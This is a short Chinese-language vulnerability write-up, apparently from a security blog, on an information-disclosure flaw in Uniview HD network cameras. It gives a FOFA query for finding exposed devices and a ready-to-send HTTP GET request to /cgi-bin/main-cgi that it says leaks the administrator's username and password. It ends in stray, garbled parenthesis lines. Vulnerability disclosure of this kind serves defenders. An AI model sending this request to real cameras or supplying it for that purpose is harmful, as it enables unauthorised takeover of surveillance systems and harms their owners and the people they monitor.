0x01 產品簡介
宇視(Uniview)高清網絡攝像機是一種高性能的網絡攝像機,它可以通過網絡進行視頻傳輸和監控。該攝像機采用先進的視頻技術,具有高清晰度、低照度、寬動態等特點,能夠提供高質量的視頻圖像。
0x02 漏洞概述
宇視(Uniview)高清網絡攝像機存在信息泄露漏洞,攻擊者可以通過解密泄露信息獲取管理員賬號密碼,登陸后臺控制整個系統,最終導致系統處于極度不安全狀態。
0x03 復現環境
FOFA:app="uniview-視頻監控"
0x04 漏洞復現
PoC
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1}" HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15獲取用戶賬號密碼
)
 ?))
)
)
)